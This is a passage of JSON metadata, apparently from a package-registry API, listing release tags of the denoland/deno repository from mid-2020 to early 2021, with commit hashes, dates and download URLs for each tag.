rl":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repo